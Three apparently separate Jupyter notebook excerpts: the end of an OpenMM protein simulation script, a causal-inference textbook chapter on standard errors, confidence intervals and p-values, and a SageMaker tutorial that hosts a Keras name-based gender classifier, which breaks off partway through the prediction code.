equilibration_log, 500, step=True, # 500 = Write every 500th step
potentialEnergy=True, totalEnergy=True,
temperature=True, progress=True,
remainingTime=True, speed=True,
totalSteps=run_length,
separator='\t')
)
simulation.step(run_length) # Run the simulation
save_state = os.path.join(cwd, 'files/6a5j_protein/eq.xml')
simulation.saveState(save_state)
pot_e = []
tot_e = []
temperature = []
with open(equilibration_log) as file_:
for line in file_:
if line.startswith("#"):
continue
pot_e_, tot_e_, temperature_ = line.split()[2:5]
pot_e.append(float(pot_e_))
tot_e.append(float(tot_e_))
temperature.append(float(temperature_))
plt.rcParams["figure.figsize"] = (10,7)
t = range(1, 101)
fig, ax = plt.subplots()
ax.plot(t, [x / 1000 for x in pot_e], label="potential")
ax.plot(t, [x / 1000 for x in tot_e], label="total")
ax.set(**{
"xlabel": "time / ps",
"xlim": (0, 100),
"ylabel": "energy / 10$^{3}$ kJ mol$^{-1}$"
})
ax.legend(
framealpha=1,
edgecolor="k",
fancybox=False
)
fig, ax = plt.subplots()
ax.plot(t, temperature)
ax.set(**{
"xlabel": "time / ps",
"xlim": (0, 100),
"ylabel": "temperature / K"
})
```
### (d) Production run (in CUDA)
```
simulation.loadState(save_state)
simulation = os.path.join(cwd, 'files/6a5j_protein/simulation.log')
simulation.reporters = [] # Reset the simulation reporters
run_length = 375000000 # 375000000 * 2 fs = 750 ns
simulation.reporters.append(
app.StateDataReporter( # State reporter that appends potential energy
simulation, 5000, step=True,
potentialEnergy=True,
temperature=True, progress=True,
remainingTime=True, speed=True,
totalSteps=run_length,
separator='\t')
)
production_dcd = os.path.join(cwd, 'files/6a5j_protein/prod_run.dcd')
simulation.reporters.append(mdtraj.reporters.DCDReporter(
production_dcd, 5000, # Structure reporter that appends positions
atomSubset=range(260)) # atomSubset = Save just the peptide atoms
)
simulation.step(run_length)
# One can visualize the saved .dcd file in VMD and compare with th original
```
|
github_jupyter
|
# 03 - Stats Review: The Most Dangerous Equation
In his famous article of 2007, Howard Wainer writes about very dangerous equations:
"Some equations are dangerous if you know them, and others are dangerous if you do not. The first category may pose danger because the secrets within its bounds open doors behind which lies terrible peril. The obvious winner in this is Einstein’s ionic equation \\(E = MC^2\\), for it provides a measure of the enormous energy hidden within ordinary matter. \[...\] Instead I am interested in equations that unleash their danger not when we know about them, but rather when we do not. Kept close at hand, these equations allow us to understand things clearly, but their absence leaves us dangerously ignorant."
The equation he talks about is Moivre’s equation:
$
SE = \dfrac{\sigma}{\sqrt{n}}
$
where \\(SE\\) is the standard error of the mean, \\(\sigma\\) is the standard deviation and \\(n\\) is the sample size. Sounds like a piece of math the brave and true should master, so let's get to it.
To see why not knowing this equation is very dangerous, let's take a look at some education data. I've compiled data on ENEM scores (Brazilian standardised high school scores, similar to SAT) from different schools for a period of 3 years. I also did some cleaning on the data to keep only the information relevant to us. The original data can be downloaded in the [Inep website](http://portal.inep.gov.br/web/guest/microdados#).
If we look at the top performing school, something catches the eye: those schools have a fairly small number of students.
```
import warnings
warnings.filterwarnings('ignore')
import pandas as pd
import numpy as np
from scipy import stats
import seaborn as sns
from matplotlib import pyplot as plt
from matplotlib import style
style.use("fivethirtyeight")
df = pd.read_csv("./data/enem_scores.csv")
df.sort_values(by="avg_score", ascending=False).head(10)
```
Looking at it from another angle, we can separate only the 1% top schools and study them. What are they like? Perhaps we can learn something from the best and replicate it elsewhere. And sure enough, if we look at the top 1% schools, we figure out they have, on average, fewer students.
```
plot_data = (df
.assign(top_school = df["avg_score"] >= np.quantile(df["avg_score"], .99))
[["top_school", "number_of_students"]]
.query(f"number_of_students<{np.quantile(df['number_of_students'], .98)}")) # remove outliers
plt.figure(figsize=(6,6))
sns.boxplot(x="top_school", y="number_of_students", data=plot_data)
plt.title("Number of Students of 1% Top Schools (Right)");
```
One natural conclusion that follows is that small schools lead to higher academic performance. This makes intuitive sense, since we believe that less students per teacher allows the teacher to give focused attention to each student. But what does this have to do with Moivre’s equation? And why is it dangerous?
Well, it becomes dangerous once people start to make important and expensive decisions based on this information. In his article, Howard continues:
"In the 1990s, it became popular to champion reductions in the size of schools. Numerous philanthropic organisations and government agencies funded the division of larger schools based on the fact that students at small schools are over represented in groups with high test scores."
What people forgot to do was to look also at the bottom 1% of schools. If we do that, lo and behold! They also have very few students!
```
q_99 = np.quantile(df["avg_score"], .99)
q_01 = np.quantile(df["avg_score"], .01)
plot_data = (df
.sample(10000)
.assign(Group = lambda d: np.select([d["avg_score"] > q_99, d["avg_score"] < q_01],
["Top", "Bottom"], "Middle")))
plt.figure(figsize=(10,5))
sns.scatterplot(y="avg_score", x="number_of_students", hue="Group", data=plot_data)
plt.title("ENEM Score by Number of Students in the School");
```
What we are seeing above is exactly what is expected according to the Moivre’s equation. As the number of students grows, the average score becomes more and more precise. Schools with very few samples can have very high and very low scores simply due to chance. This is less likley to occur with large schools. Moivre’s equation talks about a fundamental fact about the reality of information and records in the form of data: it is always imprecise. The question then becomes how imprecise.
Statistics is the science that deals with these imprecisions so they don't catch us off-guard. As Taleb puts it in his book, Fooled by Randomness:
> Probability is not a mere computation of odds on the dice or more complicated variants; it is the acceptance of the lack of certainty in our knowledge and the development of methods for dealing with our ignorance.
One way to quantify our uncertainty is the **variance of our estimates**. Variance tells us how much observation deviates from their central and most probably value. As indicated by Moivre’s equation, this uncertainty shrinks as the amount of data we observe increases. This makes sense, right? If we see lots and lots of students performing excellently at a school, we can be more confident that this is indeed a good school. However, if we see a school with only 10 students and 8 of them perform well, we need to be more suspicious. It could be that, by chance, that school got some above average students.
The beautiful triangular plot we see above tells exactly this story. It shows us how our estimates of the school performance has a huge variance when the sample sizes are small. It also shows that variance shrinks as the sample size increases. This is true for the average score in a school, but it is also true about any summary statistics that we have, including the ATE we so often want to estimate.
## The Standard Error of Our Estimates
Since this is just a review on statistics, I'll take the liberty to go a bit faster now. If you are not familiar with distributions, variance and standard errors, please, do read on, but keep in mind that you might need some additional resources. I suggest you google any MIT course on introduction to statistics. They are usually quite good.
In the previous section, we estimated the average treatment effect \\(E[Y_1-Y_0]\\) as the difference in the means between the treated and the untreated \\(E[Y|T=1]-E[Y|T=0]\\). As our motivating example, we figured out the \\(ATE\\) for online classes. We also saw that it was a negative impact, that is, online classes made students perform about 5 points worse than the students with face to face classes. Now, we get to see if this impact is statistically significant.
To do so, we need to estimate the \\(SE\\). We already have \\(n\\), our sample size. To get the estimate for the standard deviation we can do the following
$
\hat{\sigma}=\frac{1}{N-1}\sum_{i=0}^N (x-\bar{x})^2
$
where \\(\bar{x}\\) is the mean of \\(x\\). Fortunately for us, most programming software already implements this. In Pandas, we can use the method [std](https://pandas.pydata.org/pandas-docs/stable/reference/api/pandas.DataFrame.std.html).
```
data = pd.read_csv("./data/online_classroom.csv")
online = data.query("format_ol==1")["falsexam"]
face_to_face = data.query("format_ol==0 & format_blended==0")["falsexam"]
def se(y: pd.Series):
return y.std() / np.sqrt(len(y))
print("SE for Online:", se(online))
print("SE for Face to Face:", se(face_to_face))
```
## Confidence Intervals
The standard error of our estimate is a measure of confidence. To understand exactly what it means, we need to go into turbulent and polemic statistical waters. For one view of statistics, the frequentist view, we would say that the data we have is nothing more than a manifestation of a true data generating process. This process is abstract and ideal. It is governed by true parameters that are unchanging but also unknown to us. In the context of the students test, if we could run multiple experiments and collect multiple datasets, all would resemble the true underlying data generating process, but wouldn't be exactly like it. This is very much like Plato's writing on the Forms:
> Each [of the essential forms] manifests itself in a great variety of combinations, with actions, with material things, and with one another, and each seems to be many
To better grasp this, let's suppose we have a true abstract distribution of students' test score. This is a normal distribution with true mean of 74 and true standard deviation of 2. From this distribution, we can run 10000 experiments. On each one, we collect 500 samples. Some experiment data will have a mean lower than the true one, some will be higher. If we plot them in a histogram, we can see that means of the experiments are distributed around the true mean.
```
true_std = 2
true_mean = 74
n = 500
def run_experiment():
return np.random.normal(true_mean,true_std, 500)
np.random.seed(42)
plt.figure(figsize=(8,5))
freq, bins, img = plt.hist([run_experiment().mean() for _ in range(10000)], bins=40, label="Experiment Means")
plt.vlines(true_mean, ymin=0, ymax=freq.max(), linestyles="dashed", label="True Mean", color="orange")
plt.legend();
```
Notice that we are talking about the mean of means here. So, by chance, we could have an experiment where the mean is somewhat below or above the true mean. This is to say that we can never be sure that the mean of our experiment matches the true platonic and ideal mean. However, **with the standard error, we can create an interval that will contain the true mean 95% of the time**.
In real life, we don't have the luxury of simulating the same experiment with multiple datasets. We often only have one. But we can draw on the intuition above to construct what we call **confidence intervals**. Confidence intervals come with a probability attached to them. The most common one is 95%. This probability tells us how many of the hypothetical confidence intervals we would build from different studies contain the true mean. For example, the 95% confidence intervals computed from many similar studies would contain the true mean 95% of the time.
To calculate the confidence interval, we use what is called the **central limit theorem**. This theorem states that **means of experiments are normally distributed**. From statistical theory, we know that 95% of the mass of a normal distribution is between 2 standard deviations above and below the mean. Technically, 1.96, but 2 is close enough.

The Standard Error of the mean serves as our estimate of the distribution of the experiment means. So, if we multiply it by 2 and add and subtract it from the mean of one of our experiments, we will construct a 95% confidence interval for the true mean.
```
np.random.seed(321)
exp_data = run_experiment()
exp_se = exp_data.std() / np.sqrt(len(exp_data))
exp_mu = exp_data.mean()
ci = (exp_mu - 2 * exp_se, exp_mu + 2 * exp_se)
print(ci)
x = np.linspace(exp_mu - 4*exp_se, exp_mu + 4*exp_se, 100)
y = stats.norm.pdf(x, exp_mu, exp_se)
plt.plot(x, y)
plt.vlines(ci[1], ymin=0, ymax=1)
plt.vlines(ci[0], ymin=0, ymax=1, label="95% CI")
plt.legend()
plt.show()
```
Of course, we don't need to restrict ourselves to the 95% confidence interval. We could generate the 99% interval by finding what we need to multiply the standard deviation by so the interval contains 99% of the mass of a normal distribution.
The function `ppf` in python gives us the inverse of the CDF. So, `ppf(0.5)` will return 0.0, saying that 50% of the mass of the standard normal distribution is below 0.0. By the same token, if we plug 99.5%, we will have the value `z`, such that 99.5% of the distribution mass falls below this value. In other words, 0.05% of the mass falls above this value. Instead of multiplying the standard error by 2 like we did to find the 95% CI, we will multiply it by `z`, which will result in the 99% CI.
```
from scipy import stats
z = stats.norm.ppf(.995)
print(z)
ci = (exp_mu - z * exp_se, exp_mu + z * exp_se)
ci
x = np.linspace(exp_mu - 4*exp_se, exp_mu + 4*exp_se, 100)
y = stats.norm.pdf(x, exp_mu, exp_se)
plt.plot(x, y)
plt.vlines(ci[1], ymin=0, ymax=1)
plt.vlines(ci[0], ymin=0, ymax=1, label="99% CI")
plt.legend()
plt.show()
```
Back to our classroom experiment, we can construct the confidence interval for the mean exam score for both the online and face to face students' group
```
def ci(y: pd.Series):
return (y.mean() - 2 * se(y), y.mean() + 2 * se(y))
print("95% CI for Online:", ci(online))
print("95% for Face to Face:", ci(face_to_face))
```
What we can see is that the 95% CI of the groups don't overlap. The lower end of the CI for Face to Face class is above the upper end of the CI for online classes. This is evidence that our result is not by chance, and that the true mean for students in face to face clases is higher than the true mean for students in online classes. In other words, there is a significant causal decrease in academic performance when switching from face to face to online classes.
As a recap, confidence intervals are a way to place uncertainty around our estimates. The smaller the sample size, the larger the standard error and the wider the confidence interval. Finally, you should always be suspicious of measurements without any uncertainty metric attached to it. Since they are super easy to compute, lack of confidence intervals signals either some bad intentions or simply lack of knowledge, which is equally concerning.

One final word of caution here. Confidence intervals are trickier to interpret than at first glance. For instance, I **shouldn't** say that this particular 95% confidence interval contains the true population mean with 95% chance. That's because in frequentist statistics, the one that uses confidence intervals, the population mean is regarded as a true population constant. So it either is or isn't in our particular confidence interval. In other words, our particular confidence interval either contains or doesn't contain the true mean. If it does, the chance of containing it would be 100%, not 95%. If it doesn't, the chance would be 0%. Rather, in confidence intervals, the 95% refers to the frequency that such confidence intervals, computed in many many studies, contain the true mean. 95% is our confidence in the algorithm used to compute the 95% CI, not on the particular interval itself.
Now, having said that, as an Economist (statisticians, please look away now), I think this purism is not very useful. In practice, you will see people saying that the particular confidence interval contains the true mean 95% of the time. Although wrong, this is not very harmful, as it still places a precise degree of uncertainty in our estimates. Moreover, if we switch to Bayesian statistics and use probable intervals instead of confidence intervals, we would be able to say that the interval contains the distribution mean 95% of the time. Also, from what I've seen in practice, with decent sample sizes, bayesian probability intervals are more similar to confidence intervals than both bayesian and frequentists would like to admit. So, if my word counts for anything, feel free to say whatever you want about your confidence interval. I don't care if you say they contain the true mean 95% of the time. Just, please, never forget to place them around your estimates, otherwise you will look silly.
## Hypothesis Testing
Another way to incorporate uncertainty is to state a hypothesis test: is the difference in means statistically different from zero (or any other value)? To do so, we will recall that the sum or difference of 2 normal distributions is also a normal distribution. The resulting mean will be the sum or difference between the two distributions, while the variance will always be the sum of the variance:
$
N(\mu_1, \sigma_1^2) - N(\mu_2, \sigma_2^2) = N(\mu_1 - \mu_2, \sigma_1^2 + \sigma_2^2)
$
$
N(\mu_1, \sigma_1^2) + N(\mu_2, \sigma_2^2) = N(\mu_1 + \mu_2, \sigma_1^2 + \sigma_2^2)
$
If you don't recall, its OK. We can always use code and simulated data to check:
```
np.random.seed(123)
n1 = np.random.normal(4, 3, 30000)
n2 = np.random.normal(1, 4, 30000)
n_diff = n2 - n1
sns.distplot(n1, hist=False, label="N(4,3)")
sns.distplot(n2, hist=False, label="N(1,4)")
sns.distplot(n_diff, hist=False, label=f"N(4,3) - N(1,4) = N(-1, 5)")
plt.show()
```
If we take the distribution of the means of our 2 groups and subtract one from the other, we will have a third distribution. The mean of this final distribution will be the difference in the means and the standard deviation of this distribution will be the square root of the sum of the standard deviations.
$
\mu_{diff} = \mu_1 - \mu_2
$
$
SE_{diff} = \sqrt{SE_1 + SE_2} = \sqrt{\sigma_1^2/n_1 + \sigma_2^2/n_2}
$
Let's return to our classroom example. We will construct this distribution of the difference. Of course, once we have it, building the 95% CI is very easy.
```
diff_mu = online.mean() - face_to_face.mean()
diff_se = np.sqrt(face_to_face.var()/len(face_to_face) + online.var()/len(online))
ci = (diff_mu - 1.96*diff_se, diff_mu + 1.96*diff_se)
print(ci)
x = np.linspace(diff_mu - 4*diff_se, diff_mu + 4*diff_se, 100)
y = stats.norm.pdf(x, diff_mu, diff_se)
plt.plot(x, y)
plt.vlines(ci[1], ymin=0, ymax=.05)
plt.vlines(ci[0], ymin=0, ymax=.05, label="95% CI")
plt.legend()
plt.show()
```
With this at hand, we can say that we are 95% confident that the true difference between the online and face to face group falls between -8.37 and -1.44. We can also construct a **z statistic** by dividing the difference in mean by the \\\(SE\\\\) of the differences.
$
z = \dfrac{\mu_{diff} - H_{0}}{SE_{diff}} = \dfrac{(\mu_1 - \mu_2) - H_{0}}{\sqrt{\sigma_1^2/n_1 + \sigma_2^2/n_2}}
$
Where \\(H_0\\) is the value which we want to test our difference against.
The z statistic is a measure of how extreme the observed difference is. To test our hypothesis that the difference in the means is statistically different from zero, we will use contradiction. We will assume that the opposite is true, that is, we will assume that the difference is zero. This is called a null hypothesis, or \\(H_0\\). Then, we will ask ourselves "is it likely that we would observe such a difference if the true difference were indeed zero?" In statistical math terms, we can translate this question to checking how far from zero is our z statistic.
Under \\(H_0\\), the z statistic follows a standard normal distribution. So, if the difference is indeed zero, we would see the z statistic within 2 standard deviations of the mean 95% of the time. The direct consequence of this is that if z falls above or below 2 standard deviations, we can reject the null hypothesis with 95% confidence.
Let's see how this looks like in our classroom example.
```
z = diff_mu / diff_se
print(z)
x = np.linspace(-4,4,100)
y = stats.norm.pdf(x, 0, 1)
plt.plot(x, y, label="Standard Normal")
plt.vlines(z, ymin=0, ymax=.05, label="Z statistic", color="C1")
plt.legend()
plt.show()
```
This looks like a pretty extreme value. Indeed, it is above 2, which means there is less than a 5% chance that we would see such an extreme value if there were no difference in the groups. This again leads us to conclude that switching from face to face to online classes causes a statistically significant drop in academic performance.
One final interesting thing about hypothesis tests is that it is less conservative than checking if the 95% CI from the treated and untreated group overlaps. In other words, if the confidence intervals in the two groups overlap, it can still be the case that the result is statistically significant. For example, let's pretend that the face-to-face group has an average score of 74 and standard error of 7 and the online group has an average score of 71 with a standard error of 1.
```
cont_mu, cont_se = (71, 1)
test_mu, test_se = (74, 7)
diff_mu = test_mu - cont_mu
diff_se = np.sqrt(cont_se + cont_se)
print("Control 95% CI:", (cont_mu-1.96*cont_se, cont_mu+1.96*cont_se))
print("Test 95% CI:", (test_mu-1.96*test_se, test_mu+1.96*test_se))
print("Diff 95% CI:", (diff_mu-1.96*diff_se, diff_mu+1.96*diff_se))
```
If we construct the confidence intervals for these groups, they overlap. The upper bound for the 95% CI of the online group is 72.96 and the lower bound for the face-to-face group is 60.28. However, once we compute the 95% confidence interval for the difference between the groups, we can see that it does not contain zero. In summary, even though the individual confidence intervals overlap, the difference can still be statistically different from zero.
## P-values
I've said previously that there is less than 5% chance that we would observe such an extreme value if the difference between online and face to face groups were actually zero. But can we estimate exactly what is that chance? How likely are we to observe such an extreme value? Enters p-values!
Just like with confidence intervals (and most frequentist statistics, as a matter of fact) the true definition of p-values can be very confusing. So, to not take any risks, I'll copy the definition from Wikipedia: "the p-value is the probability of obtaining test results at least as extreme as the results actually observed during the test, assuming that the null hypothesis is correct".
To put it more succinctly, the p-value is the probability of seeing such data, given that the null-hypothesis is true. It measures how unlikely it is that you are seeing a measurement if the null-hypothesis is true. Naturally, this often gets confused with the probability of the null-hypothesis being true. Note the difference here. The p-value is NOT \\(P(H_0|data)\\), but rather \\(P(data|H_0)\\).
But don't let this complexity fool you. In practical terms, they are pretty straightforward to use.

To get the p-value, we need to compute the area under the standard normal distribution before or after the z statistic. Fortunately, we have a computer to do this calculation for us. We can simply plug the z statistic in the CDF of the standard normal distribution.
```
print("P-value:", stats.norm.cdf(z))
```
This means that there is only a 0.2% chance of observing this extreme z statistic if the difference was zero. Notice how the p-value is interesting because it avoids us having to specify a confidence level, like 95% or 99%. But, if we wish to report one, from the p-value, we know exactly at which confidence our test will pass or fail. For instance, with a p-value of 0.0027, we know that we have significance up to the 0.2% level. So, while the 95% CI and the 99% CI for the difference will neither contain zero, the 99.9% CI will.
```
diff_mu = online.mean() - face_to_face.mean()
diff_se = np.sqrt(face_to_face.var()/len(face_to_face) + online.var()/len(online))
print("95% CI:", (diff_mu - stats.norm.ppf(.975)*diff_se, diff_mu + stats.norm.ppf(.975)*diff_se))
print("99% CI:", (diff_mu - stats.norm.ppf(.995)*diff_se, diff_mu + stats.norm.ppf(.995)*diff_se))
print("99.9% CI:", (diff_mu - stats.norm.ppf(.9995)*diff_se, diff_mu + stats.norm.ppf(.9995)*diff_se))
```
## Keys Ideas
We've seen how important it is to know Moivre’s equation and we used it to place a degree of certainty around our estimates. Namely, we figured out that the online classes cause a decrease in academic performance compared to face to face classes. We also saw that this was a statistically significant result. We did it by comparing the Confidence Intervals of the means for the 2 groups, by looking at the confidence interval for the difference, by doing a hypothesis test and by looking at the p-value. Let's wrap everything up in a single function that does A/B testing comparison like the one we did above
```
def AB_test(test: pd.Series, control: pd.Series, confidence=0.95, h0=0):
mu1, mu2 = test.mean(), control.mean()
se1, se2 = test.std() / np.sqrt(len(test)), control.std() / np.sqrt(len(control))
diff = mu1 - mu2
se_diff = np.sqrt(test.var()/len(test) + control.var()/len(control))
z_stats = (diff-h0)/se_diff
p_value = stats.norm.cdf(z_stats)
def critial(se): return -se*stats.norm.ppf((1 - confidence)/2)
print(f"Test {confidence*100}% CI: {mu1} +- {critial(se1)}")
print(f"Control {confidence*100}% CI: {mu2} +- {critial(se2)}")
print(f"Test-Control {confidence*100}% CI: {diff} +- {critial(se_diff)}")
print(f"Z Statistic {z_stats}")
print(f"P-Value {p_value}")
AB_test(online, face_to_face)
```
Since our function is generic enough, we can test other null hypotheses. For instance, can we try to reject that the difference between online and face to face class performance is -1. With the results we get, we can say with 95% confidence that the difference is greater than -1. But we can't say it with 99% confidence:
```
AB_test(online, face_to_face, h0=-1)
```
## References
I like to think of this entire book as a tribute to Joshua Angrist, Alberto Abadie and Christopher Walters for their amazing Econometrics class. Most of the ideas here are taken from their classes at the American Economic Association. Watching them is what is keeping me sane during this tough year of 2020.
* [Cross-Section Econometrics](https://www.aeaweb.org/conference/cont-ed/2017-webcasts)
* [Mastering Mostly Harmless Econometrics](https://www.aeaweb.org/conference/cont-ed/2020-webcasts)
I'll also like to reference the amazing books from Angrist. They have shown me that Econometrics, or 'Metrics as they call it, is not only extremely useful but also profoundly fun.
* [Mostly Harmless Econometrics](https://www.mostlyharmlesseconometrics.com/)
* [Mastering 'Metrics](https://www.masteringmetrics.com/)
My final reference is Miguel Hernan and Jamie Robins' book. It has been my trustworthy companion in the most thorny causal questions I had to answer.
* [Causal Inference Book](https://www.hsph.harvard.edu/miguel-hernan/causal-inference-book/)
In this particular section, I've also referenced The [Most Dangerous Equation](https://www.researchgate.net/publication/255612702_The_Most_Dangerous_Equation), by Howard Wainer.
Finally, if you are curious about the correct interpretation of the statistical concepts we've discussed here, I recommend reading the paper by Greenland et al, 2016: [Statistical tests, P values, confidence intervals, and power: a guide to misinterpretations](https://link.springer.com/content/pdf/10.1007/s10654-016-0149-3.pdf).

## Contribute
Causal Inference for the Brave and True is an open-source material on causal inference, the statistics of science. It uses only free software, based in Python. Its goal is to be accessible monetarily and intellectually.
If you found this book valuable and you want to support it, please go to [Patreon](https://www.patreon.com/causal_inference_for_the_brave_and_true). If you are not ready to contribute financially, you can also help by fixing typos, suggesting edits or giving feedback on passages you didn't understand. Just go to the book's repository and [open an issue](https://github.com/matheusfacure/python-causality-handbook/issues). Finally, if you liked this content, please share it with others who might find it useful and give it a [star on GitHub](https://github.com/matheusfacure/python-causality-handbook/stargazers).
|
github_jupyter
|
# Gender Prediction, using Pre-trained Keras Model
Deep Neural Networks can be used to extract features in the input and derive higher level abstractions. This technique is used regularly in vision, speech and text analysis. In this exercise, we use a pre-trained model deep learning model that would identify low level features in texts containing people's names, and would be able to classify them in one of two categories - Male or Female.
## Network Architecture
The problem we are trying to solve is to predict whether a given name belongs to a male or female. We will use supervised learning, where the character sequence making up the names would be `X` variable, and the flag indicating **Male(M)** or **Female(F)** would be `Y` variable.
We use a stacked 2-Layer LSTM model and a final dense layer with softmax activation as our network architecture. We use categorical cross-entropy as loss function, with an Adam optimizer. We also add a 20% dropout layer is added for regularization to avoid over-fitting.
## Dependencies
* The model was built using Keras, therefore we need to include Keras deep learning library to build the network locally, in order to be able to test, prior to hosting the model.
* While running on SageMaker Notebook Instance, we choose conda_tensorflow kernel, so that Keras code is compiled to use tensorflow in the backend.
* If you choose P2 and P3 class of instances for your Notebook, using Tensorflow ensures the low level code takes advantage of all available GPUs. So further dependencies needs to be installed.
```
import os
import time
import numpy as np
import keras
from keras.models import load_model
import boto3
```
## Model testing
To test the validity of the model, we do some local testing.<p>
The model was built to be able to process one-hot encoded data representing names, therefore we need to do same pre-processing on our test data (one-hot encoding using the same character indices)<p>
We feed this one-hot encoded test data to the model, and the `predict` generates a vector, similar to the training labels vector we used before. Except in this case, it contains what model thinks the gender represented by each of the test records.<p>
To present data intutitively, we simply map it back to `Male` / `Female`, from the `0` / `1` flag.
```
!tar -zxvf ../pretrained-model/model.tar.gz -C ../pretrained-model/
model = load_model('../pretrained-model/lstm-gender-classifier-model.h5')
char_indices = np.load('../pretrained-model/lstm-gender-classifier-indices.npy').item()
max_name_length = char_indices['max_name_length']
char_indices.pop('max_name_length', None)
alphabet_size = len(char_indices)
print(char_indices)
print(max_name_length)
print(alphabet_size)
names_test = ["Tom","Allie","Jim","Sophie","John","Kayla","Mike","Amanda","Andrew"]
num_test = len(names_test)
X_test = np.zeros((num_test, max_name_length, alphabet_size))
for i,name in enumerate(names_test):
name = name.lower()
for t, char in enumerate(name):
X_test[i, t,char_indices[char]] = 1
predictions = model.predict(X_test)
for i,name in enumerate(names_test):
print("{} ({})".format(names_test[i],"M" if predictions[i][0]>predictions[i][1] else "F"))
```
## Model saving
In order to deploy the model behind an hosted endpoint, we need to save the model fileto an S3 location.<p>
We can obtain the name of the S3 bucket from the execution role we attached to this Notebook instance. This should work if the policies granting read permission to IAM policies was granted, as per the documentation.
If for some reason, it fails to fetch the associated bucket name, it asks the user to enter the name of the bucket. If asked, use the bucket that you created in Module-3, such as 'smworkshop-firstname-lastname'.<p>
It is important to ensure that this is the same S3 bucket, to which you provided access in the Execution role used while creating this Notebook instance.
```
sts = boto3.client('sts')
iam = boto3.client('iam')
caller = sts.get_caller_identity()
account = caller['Account']
arn = caller['Arn']
role = arn[arn.find("/AmazonSageMaker")+1:arn.find("/SageMaker")]
timestamp = role[role.find("Role-")+5:]
policyarn = "arn:aws:iam::{}:policy/service-role/AmazonSageMaker-ExecutionPolicy-{}".format(account, timestamp)
s3bucketname = ""
policystatements = []
try:
policy = iam.get_policy(
PolicyArn=policyarn
)['Policy']
policyversion = policy['DefaultVersionId']
policystatements = iam.get_policy_version(
PolicyArn = policyarn,
VersionId = policyversion
)['PolicyVersion']['Document']['Statement']
except Exception as e:
s3bucketname=input("Which S3 bucket do you want to use to host training data and model? ")
for stmt in policystatements:
action = ""
actions = stmt['Action']
for act in actions:
if act == "s3:ListBucket":
action = act
break
if action == "s3:ListBucket":
resource = stmt['Resource'][0]
s3bucketname = resource[resource.find(":::")+3:]
print(s3bucketname)
s3 = boto3.resource('s3')
s3.meta.client.upload_file('../pretrained-model/model.tar.gz', s3bucketname, 'model/model.tar.gz')
```
# Model hosting
Amazon SageMaker provides a powerful orchestration framework that you can use to productionize any of your own machine learning algorithm, using any machine learning framework and programming languages.<p>
This is possible because SageMaker, as a manager of containers, have standarized ways of interacting with your code running inside a Docker container. Since you are free to build a docker container using whatever code and depndency you like, this gives you freedom to bring your own machinery.<p>
In the following steps, we'll containerize the prediction code and host the model behind an API endpoint.<p>
This would allow us to use the model from web-application, and put it into real use.<p>
The boilerplate code, which we affectionately call the `Dockerizer` framework, was made available on this Notebook instance by the Lifecycle Configuration that you used. Just look into the folder and ensure the necessary files are available as shown.<p>
<home>
|
├── container
│
├── byoa
| |
│ ├── train
| |
│ ├── predictor.py
| |
│ ├── serve
| |
│ ├── nginx.conf
| |
│ └── wsgi.py
|
├── build_and_push.sh
│
├── Dockerfile.cpu
│
└── Dockerfile.gpu
```
os.chdir('../container')
os.getcwd()
!ls -Rl
```
* `Dockerfile` describes the container image and the accompanying script `build_and_push.sh` does the heavy lifting of building the container, and uploading it into an Amazon ECR repository
* Sagemaker containers that we'll be building serves prediction request using a Flask based application. `wsgi.py` is a wrapper to invoke the Flask application, while `nginx.conf` is the configuration for the nginx front end and `serve` is the program that launches the gunicorn server. These files can be used as-is, and are required to build the webserver stack serving prediction requests, following the architecture as shown:

<details>
<summary><strong>Request serving stack (expand to view diagram)</strong></summary><p>

</p></details>
* The file named `predictor.py` is where we need to package the code for generating inference using the trained model that was saved into an S3 bucket location by the training code during the training job run.<p>
* We'll write code into this file using Jupyter magic command - `writefile`.<p><br>
First part of the file would contain the necessary imports, as ususal.
```
%%writefile byoa/predictor.py
# This is the file that implements a flask server to do inferences. It's the file that you will modify to
# implement the scoring for your own algorithm.
from __future__ import print_function
import os
import json
import pickle
from io import StringIO
import sys
import signal
import traceback
import numpy as np
import keras
from keras.models import Sequential
from keras.layers import Dense, Dropout
from keras.layers import Embedding
from keras.layers import LSTM
from keras.models import load_model
import flask
import tensorflow as tf
import pandas as pd
from os import listdir, sep
from os.path import abspath, basename, isdir
from sys import argv
```
When run within an instantiated container, SageMaker makes the trained model available locally at `/opt/ml`
```
%%writefile -a byoa/predictor.py
prefix = '/opt/ml/'
model_path = os.path.join(prefix, 'model')
```
The machinery to produce inference is wrapped around in a Pythonic class structure, within a `Singleton` class, aptly named - `ScoringService`.<p>
We create `Class` variables in this class to hold loaded model, character indices, tensor-flow graph, and anything else that needs to be referenced while generating prediction.
```
%%writefile -a byoa/predictor.py
# A singleton for holding the model. This simply loads the model and holds it.
# It has a predict function that does a prediction based on the model and the input data.
class ScoringService(object):
model_type = None # Where we keep the model type, qualified by hyperparameters used during training
model = None # Where we keep the model when it's loaded
graph = None
indices = None # Where we keep the indices of Alphabet when it's loaded
```
Generally, we have to provide class methods to load the model and related artefacts from the model path as assigned by SageMaker within the running container.<p>
Notice here that SageMaker copies the artefacts from the S3 location (as defined during model creation) into the container local file system.
```
%%writefile -a byoa/predictor.py
@classmethod
def get_indices(cls):
#Get the indices for Alphabet for this instance, loading it if it's not already loaded
if cls.indices == None:
model_type='lstm-gender-classifier'
index_path = os.path.join(model_path, '{}-indices.npy'.format(model_type))
if os.path.exists(index_path):
cls.indices = np.load(index_path).item()
else:
print("Character Indices not found.")
return cls.indices
@classmethod
def get_model(cls):
#Get the model object for this instance, loading it if it's not already loaded
if cls.model == None:
model_type='lstm-gender-classifier'
mod_path = os.path.join(model_path, '{}-model.h5'.format(model_type))
if os.path.exists(mod_path):
cls.model = load_model(mod_path)
cls.model._make_predict_function()
cls.graph = tf.get_default_graph()
else:
print("LSTM Model not found.")
return cls.model
```
Finally, inside another clas method, named `predict`, we provide the code that we used earlier to generate prediction.<p>
Only difference with our previous test prediciton (in development notebook) is that in this case, the predictor will grab the data from the `input` variable, which in turn is obtained from the HTTP request payload.
```
%%writefile -a byoa/predictor.py
@classmethod
def predict(cls, input):
mod = cls.get_model()
ind = cls.get_indices()
result = {}
if mod == None:
print("Model not loaded.")
else:
if 'max_name_length' not in ind:
max_name_length = 15
alphabet_size = 26
else:
max_name_length = ind['max_name_length']
ind.pop('max_name_length', None)
alphabet_size = len(ind)
inputs_list = input.strip('\n').split(",")
num_inputs = len(inputs_list)
X_test = np.zeros((num_inputs, max_name_length, alphabet_size))
for i,name in enumerate(inputs_list):
name = name.lower().strip('\n')
for t, char in enumerate(name):
if char in ind:
X_test[i, t,ind[char]] = 1
with cls.graph.as_default():
predictions = mod.predict(X_test)
for i,name in enumerate(inputs_list):
